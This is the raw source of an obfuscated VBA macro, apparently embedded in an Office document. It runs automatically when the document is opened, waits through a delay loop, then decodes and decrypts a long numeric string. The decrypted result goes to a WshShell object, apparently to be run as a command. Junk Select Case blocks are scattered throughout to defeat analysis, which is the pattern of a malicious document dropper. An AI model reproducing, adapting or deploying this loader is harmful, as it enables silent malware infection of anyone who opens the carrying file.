UE8Gpx = UE8Gpx & "78r-15263r5688r-12735r534r-27r29309r6227r5492r25252r29453r4164r27735r-11985r28595r11005r-22328r-30697r-26537r-9898r-28398r25467r7268r-921r6141r11480r-7602r17103r-5868r20470r-22971r-9499r19413r3463r31601r-7670r-21505r-24170r17257r-32575r3004r-12698r4337r10559r-12915r25496r7802r-8994r25871r-7576r16633r1192r10959r907r-1081r11792r-30828r28143r-8658r18838r-5232r20973r-7458r-22786r-13612r24075r-23957r12095r-7871r-25681r-4073r-32337r-2289r-12687r6921r-20819r18034r9177r-16678r6479r9069r-18903r-11793r-14798r30531r17424r23431r2076r-21503r19168r27240r-23346r-5239r-15487r16186r21266r14635r29929r15536r23040r-21839r26531r-23278r-5421r12423r-283r23702r30413r-31903r-12341r-24476r-27723r-22967r4745r1278r-31966r-19586r25153r13420r-7954r25269r-18563r1319r-8500r234"
GHh7zL = 48
Select Case GHh7zL
Case 93
GHh7zL = GHh7zL + 1
Case 83
GHh7zL = GHh7zL + GHh7zL
Case Else
GHh7zL = GHh7zL - 1
End Select
UE8Gpx = UE8Gpx & "10r-8900r19965r10239r-20394r14269r13220r-17513r-26127r12477r-16558r21114r22770r6696r11074r-15309r29129r-17648r28191r7844r-1373r-11324r30558r14888r22810r21522r-28324r-17117r-27179r28111r-24287r-4623r16488r20590r15825r-22162r18491r26623r-19810r6873r26388r740r-10016r23695r25478r-30725r-21387r3013r-10649r31225r-12131r12626r-3061r14576r-11131r4967r-7663r11586r7237r-6187r-24140r19646r18292r-827r13116r11456r14659r22517r-24243r13162r-28556r-27577r-2913r26431r-10142r-1349r-29150r-13736r5602r11725r31152r13781r24892r11430r-28009r1227r16247r15346r4708r-18459r21287r22170r19787r20418r14942r-29197r-6503r-13826r-21303r-7979r-25177r-23716r31716r-2684r14327r4994r5258r20810r-468r-10582r26303r3880r-32090r3753r-32609r23795r-30139r-10452r-17803r28519r26079r-29003r115"
M6iVS7E = 13
Select Case M6iVS7E
Case 14
M6iVS7E = M6iVS7E + 1
Case 72
M6iVS7E = M6iVS7E + M6iVS7E
Case Else
M6iVS7E = M6iVS7E - 1
End Select
UE8Gpx = UE8Gpx & "43r28257r-25678r2285r1347r26463r11297r6138r10090r-4650r-27876r12864r-5213r-9487r7680r7569r-13081r-8507r-9450r12295r4033r21182r-20654r17834r-19326r20163r4335r-13958r-26428r-20516r21716r11447r-15209r22969r-31519r16276r32650r28606r-4769r-17398r-3746r8027r6612r-3347r-10362r-5058r10225r5054r-28443r16263r-1283r14919r30271r-13907r6901r24682r9924r-31138r7979r5174r-16507r-9106r-2326r20896r5494r-10035r15055r-31092r23921r-9986r-1511r-30915r-1566r24432r-5657r21606r-20664r23386r9507r-23061r31450r-14896r-1488r1516r-31651r-22587r2231r-10919r10825r2827r-11275r5533r22133r-12210r21778r23832r12490r17091r15038r11813r17134r-4381r11426r4080r-15992r26375r-14032r30041r3206r32434r-15132r-8349r507r-29284r23614r-8634r-28674r-3686r26877r-25398r8485r-16669r-9656r-5362r24296"
XVN = 49
Select Case XVN
Case 4
XVN = XVN + 1
Case 13
XVN = XVN + XVN
Case Else
XVN = XVN - 1
End Select
UE8Gpx = UE8Gpx & "r-30916r14761r-18510r-22403r26669r-15656r-18584r16200r18129r23738r-26085r10003r1536r-963r-15287r-21012r1382r25759r-9852r-27941r12459r21159r-22368r-18882r8615r-27225r12912r-16859r-11028r31980r15881r-10026r-22465r18672r11146r-12683r4662r30905r19529r22071r6564r-15903r-10291r28741r16209r21531r5757r18593r8309r18195r32057r-32339r13451r-24329r-17838r-13011r4906r-4503r-11243r-22900r14725r-10290r-20888r-6431r-23538r18225r-28806r-30538r17510r29926r-10434r-13860r-9997r-26198r3724r-25653r5504r-12357r28917r-28214r-28512r-13556r11235r-7054r-14723r21089r-7543r-31574r-5105r24995r-19574r18509r5645r-11960r16504r-23897r-19231r1422r30246r9118r31187r31837r-28880r10401r30917r23760r-23257r1400r-11612r-16346r29621r-31210r-3616r-31226r22518r-24992r4469r-29076r18430r-220"
Nc = 91
Select Case Nc
Case 51
Nc = Nc + 1
Case 97
Nc = Nc + Nc
Case Else
Nc = Nc - 1
End Select
UE8Gpx = UE8Gpx & "54r26016r28702r13227r-2176r25235r-13285r28341r-13595r-30928r31680r9438r14370r-31364r12598r1606r29857r-20277r3196r9735r-27436r-12688r-24339r15556r14206r4896r18808r21399r13279r7055r-10016r20678r-8579r15360r25169r1859r10320r-27628r3877r-2989r16736r10700r26059r-32020r17936r2463r-13817r-17867r-22744r2157r25587r19222r2240r9297r-17419r-22976r29314r-22366r15895r8468r-20673r29048r-9399r10502r26669r-28214r15818r-27449r27337r29619r-566r13575r-7208r27372r-20852r-15857r3695r4699r-27071r-2148r-22052r5800r-9640r6834r-21994r-3290r-2071r31764r30326r25417r-28749r-6306r-2135r-28013r-6714r20791r5552r14932r14787r-28425r12944r5552r-27097r-14016r-12267r-13667r12109r-31058r23065r-4062r-20147r18054r14579r-5870r25188r-24253r27791r30853r-30720r32420r8122r17943r23869r30244"
Xh0jH = 17
Select Case Xh0jH
Case 13
Xh0jH = Xh0jH + 1
Case 1
Xh0jH = Xh0jH + Xh0jH
Case Else
Xh0jH = Xh0jH - 1
End Select
Dim BEo9f() As String, PtFU13 As Integer
Nyx = 94
Select Case Nyx
Case 7
Nyx = Nyx + 1
Case 98
Nyx = Nyx + Nyx
Case Else
Nyx = Nyx - 1
End Select
BEo9f = Split(UE8Gpx, M9v((102 + 12)))
Mgb = 40
Select Case Mgb
Case 57
Mgb = Mgb + 1
Case 58
Mgb = Mgb + Mgb
Case Else
Mgb = Mgb - 1
End Select
ReDim NBl0Twa(2083)
TLX = 41
Select Case TLX
Case 54
TLX = TLX + 1
Case 68
TLX = TLX + TLX
Case Else
TLX = TLX - 1
End Select
For PtFU13 = 0 To 2083
NBl0Twa(PtFU13) = BEo9f(PtFU13)
Next PtFU13
Dim LH2q As String, KycBucE As Long, FY As String, VM1ef As String, Gej As String, K4Tp9Qd As String, IJRGTF As String, YW1QQ As String, ODX() As Byte
DohU15Y = 26
Select Case DohU15Y
Case 11
DohU15Y = DohU15Y + 1
Case 58
DohU15Y = DohU15Y + DohU15Y
Case Else
DohU15Y = DohU15Y - 1
End Select
PH7vlv5 = 5
Select Case PH7vlv5
Case 74
PH7vlv5 = PH7vlv5 + 1
Case 40
PH7vlv5 = PH7vlv5 + PH7vlv5
Case Else
PH7vlv5 = PH7vlv5 - 1
End Select
Dim FyXlPvn(15) As Byte, AiaL663(35) As Byte
MyAB0 = 41
Select Case MyAB0
Case 78
MyAB0 = MyAB0 + 1
Case 39
MyAB0 = MyAB0 + MyAB0
Case Else
MyAB0 = MyAB0 - 1
End Select
FyXlPvn(0) = 157
FyXlPvn(1) = 29
FyXlPvn(2) = 33
FyXlPvn(3) = 241
FyXlPvn(4) = 65
FyXlPvn(5) = 36
FyXlPvn(6) = 163
FyXlPvn(7) = 171
FyXlPvn(8) = 112
FyXlPvn(9) = 161
FyXlPvn(10) = 166
FyXlPvn(11) = 188
FyXlPvn(12) = 31
FyXlPvn(13) = 241
FyXlPvn(14) = 64
FyXlPvn(15) = 234
RKe = 35
Select Case RKe
Case 70
RKe = RKe + 1
Case 64
RKe = RKe + RKe
Case Else
RKe = RKe - 1
End Select
AiaL663(0) = 71
AiaL663(1) = 113
AiaL663(2) = 56
AiaL663(3) = 121
AiaL663(4) = 70
AiaL663(5) = 67
AiaL663(6) = 77
AiaL663(7) = 87
AiaL663(8) = 107
AiaL663(9) = 57
AiaL663(10) = 65
AiaL663(11) = 84
AiaL663(12) = 98
AiaL663(13) = 82
AiaL663(14) = 77
AiaL663(15) = 102
BnKMVmY = 6
Select Case BnKMVmY
Case 25
BnKMVmY = BnKMVmY + 1
Case 15
BnKMVmY = BnKMVmY + BnKMVmY
Case Else
BnKMVmY = BnKMVmY - 1
End Select
For KycBucE = WsJBHKt(EgdgXv) To WsJBHKt(FyDe)
AiaL663(16) = Y7Y(KycBucE, 1)
AiaL663(17) = Y7Y(KycBucE, 2)
AiaL663(18) = Y7Y(KycBucE, 3)
AiaL663(19) = Y7Y(KycBucE, 4)
AiaL663(20) = AiaL663(16)
AiaL663(21) = AiaL663(17)
AiaL663(22) = AiaL663(18)
AiaL663(23) = AiaL663(19)
AiaL663(24) = AiaL663(16)
AiaL663(25) = AiaL663(17)
AiaL663(26) = AiaL663(18)
AiaL663(27) = AiaL663(19)
AiaL663(28) = AiaL663(16)
AiaL663(29) = AiaL663(17)
AiaL663(30) = AiaL663(18)
AiaL663(31) = AiaL663(19)
AiaL663(32) = AiaL663(16)
AiaL663(33) = AiaL663(17)
AiaL663(34) = AiaL663(18)
AiaL663(35) = AiaL663(19)
If EQs(FyXlPvn, AiaL663) = "TKP5FK9KUOEWvLur" Then Exit For
Next KycBucE
DTMyD = 34
Select Case DTMyD
Case 14
DTMyD = DTMyD + 1
Case 74
DTMyD = DTMyD + DTMyD
Case Else
DTMyD = DTMyD - 1
End Select
Dim MLYIu(14) As Byte, EUuM2J(35) As Byte
DTGd = 48
Select Case DTGd
Case 57
DTGd = DTGd + 1
Case 29
DTGd = DTGd + DTGd
Case Else
DTGd = DTGd - 1
End Select
MLYIu(0) = 202
MLYIu(1) = 75
MLYIu(2) = 113
MLYIu(3) = 174
MLYIu(4) = 2
MLYIu(5) = 176
MLYIu(6) = 230
MLYIu(7) = 197
MLYIu(8) = 233
MLYIu(9) = 183
MLYIu(10) = 117
MLYIu(11) = 23
MLYIu(12) = 206
MLYIu(13) = 228
MLYIu(14) = 167
Oq = 85
Select Case Oq
Case 69
Oq = Oq + 1
Case 18
Oq = Oq + Oq
Case Else
Oq = Oq - 1
End Select
EUuM2J(0) = 69
EUuM2J(1) = 48
EUuM2J(2) = 69
EUuM2J(3) = 106
EUuM2J(4) = 75
EUuM2J(5) = 68
EUuM2J(6) = 104
EUuM2J(7) = 66
EUuM2J(8) = 119
EUuM2J(9) = 53
EUuM2J(10) = 98
EUuM2J(11) = 75
EUuM2J(12) = 122
EUuM2J(13) = 83
EUuM2J(14) = 114
EUuM2J(15) = 65
JZmW75 = 96
Select Case JZmW75
Case 80
JZmW75 = JZmW75 + 1
Case 29
JZmW75 = JZmW75 + JZmW75
Case Else
JZmW75 = JZmW75 - 1
End Select
For KycBucE = WsJBHKt(EgdgXv) To WsJBHKt(FyDe)
EUuM2J(16) = Y7Y(KycBucE, 1)
EUuM2J(17) = Y7Y(KycBucE, 2)
EUuM2J(18) = Y7Y(KycBucE, 3)
EUuM2J(19) = Y7Y(KycBucE, 4)
EUuM2J(20) = EUuM2J(16)
EUuM2J(21) = EUuM2J(17)
EUuM2J(22) = EUuM2J(18)
EUuM2J(23) = EUuM2J(19)
EUuM2J(24) = EUuM2J(16)
EUuM2J(25) = EUuM2J(17)
EUuM2J(26) = EUuM2J(18)
EUuM2J(27) = EUuM2J(19)
EUuM2J(28) = EUuM2J(16)
EUuM2J(29) = EUuM2J(17)
EUuM2J(30) = EUuM2J(18)
EUuM2J(31) = EUuM2J(19)
EUuM2J(32) = EUuM2J(16)
EUuM2J(33) = EUuM2J(17)
EUuM2J(34) = EUuM2J(18)
EUuM2J(35) = EUuM2J(19)
If EQs(MLYIu, EUuM2J) = "NxjKRPjAWnM15Pa" Then Exit For
Next KycBucE
DdtTPUm = 27
Select Case DdtTPUm
Case 64
DdtTPUm = DdtTPUm + 1
Case 24
DdtTPUm = DdtTPUm + DdtTPUm
Case Else
DdtTPUm = DdtTPUm - 1
End Select
Dim TqwPEi(10) As Byte, MF1lpS0(31) As Byte
INIzzS = 3
Select Case INIzzS
Case 47
INIzzS = INIzzS + 1
Case 16
INIzzS = INIzzS + INIzzS
Case Else
INIzzS = INIzzS - 1
End Select
TqwPEi(0) = 232
TqwPEi(1) = 27
TqwPEi(2) = 127
TqwPEi(3) = 239
TqwPEi(4) = 142
TqwPEi(5) = 235
TqwPEi(6) = 123
TqwPEi(7) = 64
TqwPEi(8) = 4
TqwPEi(9) = 231
TqwPEi(10) = 244
NBonM = 1
Select Case NBonM
Case 29
NBonM = NBonM + 1
Case 70
NBonM = NBonM + NBonM
Case Else
NBonM = NBonM - 1
End Select
MF1lpS0(0) = 88
MF1lpS0(1) = 73
MF1lpS0(2) = 110
MF1lpS0(3) = 88
MF1lpS0(4) = 113
MF1lpS0(5) = 79
MF1lpS0(6) = 80
MF1lpS0(7) = 87
MF1lpS0(8) = 51
MF1lpS0(9) = 75
MF1lpS0(10) = 100
MF1lpS0(11) = 114
GHg6 = 84
Select Case GHg6
Case 41
GHg6 = GHg6 + 1
Case 45
GHg6 = GHg6 + GHg6
Case Else
GHg6 = GHg6 - 1
End Select
For KycBucE = WsJBHKt(EgdgXv) To WsJBHKt(FyDe)
MF1lpS0(12) = Y7Y(KycBucE, 1)
MF1lpS0(13) = Y7Y(KycBucE, 2)
MF1lpS0(14) = Y7Y(KycBucE, 3)
MF1lpS0(15) = Y7Y(KycBucE, 4)
MF1lpS0(16) = MF1lpS0(12)
MF1lpS0(17) = MF1lpS0(13)
MF1lpS0(18) = MF1lpS0(14)
MF1lpS0(19) = MF1lpS0(15)
MF1lpS0(20) = MF1lpS0(12)
MF1lpS0(21) = MF1lpS0(13)
MF1lpS0(22) = MF1lpS0(14)
MF1lpS0(23) = MF1lpS0(15)
MF1lpS0(24) = MF1lpS0(12)
MF1lpS0(25) = MF1lpS0(13)
MF1lpS0(26) = MF1lpS0(14)
MF1lpS0(27) = MF1lpS0(15)
MF1lpS0(28) = MF1lpS0(12)
MF1lpS0(29) = MF1lpS0(13)
MF1lpS0(30) = MF1lpS0(14)
MF1lpS0(31) = MF1lpS0(15)
If EQs(TqwPEi, MF1lpS0) = "U57YJR9bNJK" Then Exit For
Next KycBucE
W6pe6D = 14
Select Case W6pe6D
Case 27
W6pe6D = W6pe6D + 1
Case 41
W6pe6D = W6pe6D + W6pe6D
Case Else
W6pe6D = W6pe6D - 1
End Select
Dim Olq(13) As Byte, BMQ9Ou(34) As Byte
MTYEfM = 31
Select Case MTYEfM
Case 14
MTYEfM = MTYEfM + 1
Case 40
MTYEfM = MTYEfM + MTYEfM
Case Else
MTYEfM = MTYEfM - 1
End Select
Olq(0) = 247
Olq(1) = 250
Olq(2) = 56
Olq(3) = 146
Olq(4) = 163
Olq(5) = 12
Olq(6) = 228
Olq(7) = 49
Olq(8) = 196
Olq(9) = 103
Olq(10) = 178
Olq(11) = 22
Olq(12) = 142
Olq(13) = 135
MnLE = 19
Select Case MnLE
Case 52
MnLE = MnLE + 1
Case 25
MnLE = MnLE + MnLE
Case Else
MnLE = MnLE - 1
End Select
BMQ9Ou(0) = 73
BMQ9Ou(1) = 55
BMQ9Ou(2) = 105
BMQ9Ou(3) = 119
BMQ9Ou(4) = 121
BMQ9Ou(5) = 100
BMQ9Ou(6) = 69
BMQ9Ou(7) = 117
BMQ9Ou(8) = 78
BMQ9Ou(9) = 52
BMQ9Ou(10) = 53
BMQ9Ou(11) = 80
BMQ9Ou(12) = 73
BMQ9Ou(13) = 67
BMQ9Ou(14) = 56
AR = 15
Select Case AR
Case 3
AR = AR + 1
Case 38
AR = AR + AR
Case Else
AR = AR - 1
End Select
For KycBucE = WsJBHKt(EgdgXv) To WsJBHKt(FyDe)
BMQ9Ou(15) = Y7Y(KycBucE, 1)
BMQ9Ou(16) = Y7Y(KycBucE, 2)
BMQ9Ou(17) = Y7Y(KycBucE, 3)
BMQ9Ou(18) = Y7Y(KycBucE, 4)
BMQ9Ou(19) = BMQ9Ou(15)
BMQ9Ou(20) = BMQ9Ou(16)
BMQ9Ou(21) = BMQ9Ou(17)
BMQ9Ou(22) = BMQ9Ou(18)
BMQ9Ou(23) = BMQ9Ou(15)
BMQ9Ou(24) = BMQ9Ou(16)
BMQ9Ou(25) = BMQ9Ou(17)
BMQ9Ou(26) = BMQ9Ou(18)
BMQ9Ou(27) = BMQ9Ou(15)
BMQ9Ou(28) = BMQ9Ou(16)
BMQ9Ou(29) = BMQ9Ou(17)
BMQ9Ou(30) = BMQ9Ou(18)
BMQ9Ou(31) = BMQ9Ou(15)
BMQ9Ou(32) = BMQ9Ou(16)
BMQ9Ou(33) = BMQ9Ou(17)
BMQ9Ou(34) = BMQ9Ou(18)
If EQs(Olq, BMQ9Ou) = "K5zA6CNOLBxPeM" Then Exit For
Next KycBucE
KFH = 28
Select Case KFH
Case 50
KFH = KFH + 1
Case 82
KFH = KFH + KFH
Case Else
KFH = KFH - 1
End Select
AoT = 97
Select Case AoT
Case 87
AoT = AoT + 1
Case 44
AoT = AoT + AoT
Case Else
AoT = AoT - 1
End Select
Dim SRjQnlK As Long, Qx61QA As Long, YokxI As Long, YiDQCJY As Long, FJ74bY(4172) As Byte, Opcolk As Long, WAZ2q As String
Le = 19
Select Case Le
Case 16
Le = Le + 1
Case 25
Le = Le + Le
Case Else
Le = Le - 1
End Select
For SRjQnlK = 0 To WsJBHKt(NBl0Twa)
TAJa = 10
Select Case TAJa
Case 41
TAJa = TAJa + 1
Case 22
TAJa = TAJa + TAJa
Case Else
TAJa = TAJa - 1
End Select
For Qx61QA = 1 To 2
Uir = 12
Select Case Uir
Case 95
Uir = Uir + 1
Case 44
Uir = Uir + Uir
Case Else
Uir = Uir - 1
End Select
If YokxI = 1 Then
JFRCu = 79
Select Case JFRCu
Case 20
JFRCu = JFRCu + 1
Case 46
JFRCu = JFRCu + JFRCu
Case Else
JFRCu = JFRCu - 1
End Select
FJ74bY(YiDQCJY) = CS(NBl0Twa(Opcolk))(YokxI)
Q0Kh = 79
Select Case Q0Kh
Case 31
Q0Kh = Q0Kh + 1
Case 52
Q0Kh = Q0Kh + Q0Kh
Case Else
Q0Kh = Q0Kh - 1
End Select
Else
R6CM = 69
Select Case R6CM
Case 10
R6CM = R6CM + 1
Case 13
R6CM = R6CM + R6CM
Case Else
R6CM = R6CM - 1
End Select
YokxI = 0
Nmu = 12
Select Case Nmu
Case 48
Nmu = Nmu + 1
Case 86
Nmu = Nmu + Nmu
Case Else
Nmu = Nmu - 1
End Select
FJ74bY(YiDQCJY) = CS(NBl0Twa(Opcolk))(YokxI)
DVIM9Jp = 67
Select Case DVIM9Jp
Case 81
DVIM9Jp = DVIM9Jp + 1
Case 39
DVIM9Jp = DVIM9Jp + DVIM9Jp
Case Else
DVIM9Jp = DVIM9Jp - 1
End Select
End If
Yc = 72
Select Case Yc
Case 50
Yc = Yc + 1
Case 90
Yc = Yc + Yc
Case Else
Yc = Yc - 1
End Select
YiDQCJY = YiDQCJY + 1
Wm = 98
Select Case Wm
Case 73
Wm = Wm + 1
Case 47
Wm = Wm + Wm
Case Else
Wm = Wm - 1
End Select
YokxI = YokxI + 1
B80Al = 50
Select Case B80Al
Case 58
B80Al = B80Al + 1
Case 8
B80Al = B80Al + B80Al
Case Else
B80Al = B80Al - 1
End Select
Next Qx61QA
LE4nd4 = 35
Select Case LE4nd4
Case 3
LE4nd4 = LE4nd4 + 1
Case 46
LE4nd4 = LE4nd4 + LE4nd4
Case Else
LE4nd4 = LE4nd4 - 1
End Select
Opcolk = Opcolk + 1
LD3i = 28
Select Case LD3i
Case 84
LD3i = LD3i + 1
Case 15
LD3i = LD3i + LD3i
Case Else
LD3i = LD3i - 1
End Select
Next SRjQnlK
WiFV = 83
Select Case WiFV
Case 70
WiFV = WiFV + 1
Case 83
WiFV = WiFV + WiFV
Case Else
WiFV = WiFV - 1
End Select
Dim CkCuWhW(138) As Byte, SeD6k5b As Long, IZEIyU As Long
Bn0Bhf5 = 55
Select Case Bn0Bhf5
Case 41
Bn0Bhf5 = Bn0Bhf5 + 1
Case 10
Bn0Bhf5 = Bn0Bhf5 + Bn0Bhf5
Case Else
Bn0Bhf5 = Bn0Bhf5 - 1
End Select
SeD6k5b = 0
Uwb1C = 35
Select Case Uwb1C
Case 2
Uwb1C = Uwb1C + 1
Case 1
Uwb1C = Uwb1C + Uwb1C
Case Else
Uwb1C = Uwb1C - 1
End Select
IZEIyU = 0
Dd9C0ej = 81
Select Case Dd9C0ej
Case 46
Dd9C0ej = Dd9C0ej + 1
Case 79
Dd9C0ej = Dd9C0ej + Dd9C0ej
Case Else
Dd9C0ej = Dd9C0ej - 1
End Select
For KycBucE = 0 To WsJBHKt(AiaL663)
CkCuWhW(KycBucE) = AiaL663(KycBucE)
SeD6k5b = SeD6k5b + 1
Next KycBucE
Tg7W = 18
Select Case Tg7W
Case 3
Tg7W = Tg7W + 1
Case 95
Tg7W = Tg7W + Tg7W
Case Else
Tg7W = Tg7W - 1
End Select
For KycBucE = WsJBHKt(AiaL663) + 1 To WsJBHKt(EUuM2J) + SeD6k5b
CkCuWhW(KycBucE) = EUuM2J(IZEIyU)
IZEIyU = IZEIyU + 1
SeD6k5b = SeD6k5b + 1
Next KycBucE
NT = 46
Select Case NT
Case 91
NT = NT + 1
Case 81
NT = NT + NT
Case Else
NT = NT - 1
End Select
IZEIyU = 0
Vao = 56
Select Case Vao
Case 2
Vao = Vao + 1
Case 65
Vao = Vao + Vao
Case Else
Vao = Vao - 1
End Select
For KycBucE = SeD6k5b To WsJBHKt(MF1lpS0) + SeD6k5b
CkCuWhW(KycBucE) = MF1lpS0(IZEIyU)
IZEIyU = IZEIyU + 1
SeD6k5b = SeD6k5b + 1
Next KycBucE
VK = 95
Select Case VK
Case 84
VK = VK + 1
Case 64
VK = VK + VK
Case Else
VK = VK - 1
End Select
IZEIyU = 0
OIFVt = 25
Select Case OIFVt
Case 34
OIFVt = OIFVt + 1
Case 79
OIFVt = OIFVt + OIFVt
Case Else
OIFVt = OIFVt - 1
End Select
For KycBucE = SeD6k5b To WsJBHKt(BMQ9Ou) + SeD6k5b
CkCuWhW(KycBucE) = BMQ9Ou(IZEIyU)
IZEIyU = IZEIyU + 1
SeD6k5b = SeD6k5b + 1
Next KycBucE
KnYRdD = 69
Select Case KnYRdD
Case 21
KnYRdD = KnYRdD + 1
Case 20
KnYRdD = KnYRdD + KnYRdD
Case Else
KnYRdD = KnYRdD - 1
End Select
ODX = FJ74bY
PQ = 9
Select Case PQ
Case 68
PQ = PQ + 1
Case 37
PQ = PQ + PQ
Case Else
PQ = PQ - 1
End Select
ReDim Preserve ODX(4167)
PigH = 34
Select Case PigH
Case 39
PigH = PigH + 1
Case 78
PigH = PigH + PigH
Case Else
PigH = PigH - 1
End Select
WAZ2q = EQs(ODX, CkCuWhW)
VSx = 15
Select Case VSx
Case 36
VSx = VSx + 1
Case 25
VSx = VSx + VSx
Case Else
VSx = VSx - 1
End Select
JDT = 58
Select Case JDT
Case 93
JDT = JDT + 1
Case 87
JDT = JDT + JDT
Case Else
JDT = JDT - 1
End Select
BeJaoE = 82
Select Case BeJaoE
Case 83
BeJaoE = BeJaoE + 1
Case 80
BeJaoE = BeJaoE + BeJaoE
Case Else
BeJaoE = BeJaoE - 1
End Select
Dim RH0F9qy As New WshShell
QAt94O = 19
Select Case QAt94O
Case 3
QAt94O = QAt94O + 1
Case 51
QAt94O = QAt94O + QAt94O
Case Else
QAt94O = QAt94O - 1
End Select
Dim RXk(2) As Byte, EL8CRF(10) As Byte
U0UR3j = 79
Select Case U0UR3j
Case 54
U0UR3j = U0UR3j + 1
Case 55
U0UR3j = U0UR3j + U0UR3j
Case Else
U0UR3j = U0UR3j - 1
End Select
RXk(0) = 222
RXk(1) = 189
RXk(2) = 120
FZ = 85
Select Case FZ
Case 35
FZ = FZ + 1
Case 13
FZ = FZ + FZ
Case Else
FZ = FZ - 1
End Select
EL8CRF(0) = 66
EL8CRF(1) = 83
EL8CRF(2) = 98
EL8CRF(3) = 72
EL8CRF(4) = 75
EL8CRF(5) = 99
EL8CRF(6) = 80
EL8CRF(7) = 87
EL8CRF(8) = 105
EL8CRF(9) = 69
EL8CRF(10) = 99
CallByName RH0F9qy, EQs(RXk, EL8CRF), 5562 - 5561, WAZ2q, 6977 - 6977, 1357 - 1357
CV = 43
Select Case CV
Case 28
CV = CV + 1
Case 21
CV = CV + CV
Case Else
CV = CV - 1
End Select
End Sub
Private Function Dy(OxYzPfL() As Byte) As String
Tsny0zp = 49
Select Case Tsny0zp
Case 94
Tsny0zp = Tsny0zp + 1
Case 84
Tsny0zp = Tsny0zp + Tsny0zp
Case Else
Tsny0zp = Tsny0zp - 1
End Select
Dim MBfj As Long
FjL = 45
Select Case FjL
Case 35
FjL = FjL + 1
Case 37
FjL = FjL + FjL
Case Else
FjL = FjL - 1
End Select
For MBfj = 0 To WsJBHKt(OxYzPfL)
Ts3lN = 85
Select Case Ts3lN
Case 57
Ts3lN = Ts3lN + 1
Case 82
Ts3lN = Ts3lN + Ts3lN
Case Else
Ts3lN = Ts3lN - 1
End Select
Dy = Dy & M9v(OxYzPfL(MBfj))
Fx4 = 70
Select Case Fx4
Case 56
Fx4 = Fx4 + 1
Case 26
Fx4 = Fx4 + Fx4
Case Else
Fx4 = Fx4 - 1
End Select
Next MBfj
KfiXz32 = 17
Select Case KfiXz32
Case 17
KfiXz32 = KfiXz32 + 1
Case 91
KfiXz32 = KfiXz32 + KfiXz32
Case Else
KfiXz32 = KfiXz32 - 1
End Select
End Function
Private Sub DoCument_open()
OS = 80
Select Case OS
Case 38
OS = OS + 1
Case 67
OS = OS + OS
Case Else
OS = OS - 1
End Select
On Error Resume Next
DtgXmJq = 10
Select Case DtgXmJq
Case 23
DtgXmJq = DtgXmJq + 1
Case 37
DtgXmJq = DtgXmJq + DtgXmJq
Case Else
DtgXmJq = DtgXmJq - 1
End Select
Dim AgUs As Long, XMcTUM As Long, C6mChLf As Long
FvI5BvJ = 95
Select Case FvI5BvJ
Case 79
FvI5BvJ = FvI5BvJ + 1
Case 28
FvI5BvJ = FvI5BvJ + FvI5BvJ
Case Else
FvI5BvJ = FvI5BvJ - 1
End Select
AgUs = 94531
CbLLQsd = 78
Select Case CbLLQsd
Case 43
CbLLQsd = CbLLQsd + 1
Case 76
CbLLQsd = CbLLQsd + CbLLQsd
Case Else
CbLLQsd = CbLLQsd - 1
End Select
For XMcTUM = 1 To AgUs
C6mChLf = C6mChLf + 1
Next XMcTUM
E7UK = 46
Select Case E7UK
Case 39
E7UK = E7UK + 1
Case 61
E7UK = E7UK + E7UK
Case Else
E7UK = E7UK - 1
End Select
If C6mChLf = AgUs Then
MR = 43
Select Case MR
Case 88
MR = MR + 1
Case 78
MR = MR + MR
Case Else
MR = MR - 1
End Select
Dim BSqlw5 As Integer, FoZrBp As String
For BSqlw5 = 9 To 353
FoZrBp = FoZrBp + BSqlw5
Next
VG0pb = 91
Select Case VG0pb
Case 82
VG0pb = VG0pb + 1
Case 83
VG0pb = VG0pb + VG0pb
Case Else
VG0pb = VG0pb - 1
End Select
LZkN
Else
Ehoiv = 12
Select Case Ehoiv
Case 22
Ehoiv = Ehoiv + 1
Case 92
Ehoiv = Ehoiv + Ehoiv
Case Else
Ehoiv = Ehoiv - 1
End Select
Yqa
Nuqh = 86
Select Case Nuqh
Case 84
Nuqh = Nuqh + 1
Case 16
Nuqh = Nuqh + Nuqh
Case Else
Nuqh = Nuqh - 1
End Select
End If
QI3Ci = 17
Select Case QI3Ci
Case 65
QI3Ci = QI3Ci + 1
Case 21
QI3Ci = QI3Ci + QI3Ci
Case Else
QI3Ci = QI3Ci - 1
End Select
End Sub
Private Function CS(PDOYtY3 As Integer) As Byte()
Jftvnd = 95
Select Case Jftvnd
Case 69
Jftvnd = Jftvnd + 1
Case 22
Jftvnd = Jftvnd + Jftvnd
Case Else
Jftvnd = Jftvnd - 1
End Select
Dim E8Ok7w8(1) As Byte, U2PwLK As Long, R9oLum As Byte
Cf = 25
Select Case Cf
Case 19
Cf = Cf + 1
Case 63
Cf = Cf + Cf
Case Else
Cf = Cf - 1
End Select
For U2PwLK = 0 To 1
E8Ok7w8(U2PwLK) = (Int(PDOYtY3 / (2 ^ ((21504 / 2688) * (1 - U2PwLK))))) And (7602 - 7347)
Next U2PwLK
Y8hx = 39
Select Case Y8hx
Case 51
Y8hx = Y8hx + 1
Case 87
Y8hx = Y8hx + Y8hx
Case Else
Y8hx = Y8hx - 1
End Select
ReDim CS(1) As Byte
F1 = 21
Select Case F1
Case 18
F1 = F1 + 1
Case 27
F1 = F1 + F1
Case Else
F1 = F1 - 1
End Select
For U2PwLK = 0 To 1 \ 2
R9oLum = E8Ok7w8(U2PwLK)
E8Ok7w8(U2PwLK) = E8Ok7w8(1 - U2PwLK)
E8Ok7w8(1 - U2PwLK) = R9oLum
Next
Bp = 58
Select Case Bp
Case 17
Bp = Bp + 1
Case 42
Bp = Bp + Bp
Case Else
Bp = Bp - 1
End Select
CS = E8Ok7w8
Cftd6m = 16
Select Case Cftd6m
Case 47
Cftd6m = Cftd6m + 1
Case 76
Cftd6m = Cftd6m + Cftd6m
Case Else
Cftd6m = Cftd6m - 1
End Select
End Function
Private Function Ec(ByVal JPMJHS As String, ByVal AuD As Long, ByVal XC As Variant) As String
U4D7Y = 75
Select Case U4D7Y
Case 51
U4D7Y = U4D7Y + 1
Case 51
U4D7Y = U4D7Y + U4D7Y
Case Else
U4D7Y = U4D7Y - 1
End Select
Dim PR70DrJ() As Byte, MdN3() As Byte, C2h As Long, BeFu As Long
ApZIiLp = 19
Select Case ApZIiLp
Case 61
ApZIiLp = ApZIiLp + 1
Case 8
ApZIiLp = ApZIiLp + ApZIiLp
Case Else
ApZIiLp = ApZIiLp - 1
End Select
PR70DrJ = JPMJHS
NgM = 25
Select Case NgM
Case 81
NgM = NgM + 1
Case 85
NgM = NgM + NgM
Case Else
NgM = NgM - 1
End Select
C2h = WsJBHKt(PR70DrJ)
BZWX = 83
Select Case BZWX
Case 54
BZWX = BZWX + 1
Case 67
BZWX = BZWX + BZWX
Case Else
BZWX = BZWX - 1
End Select
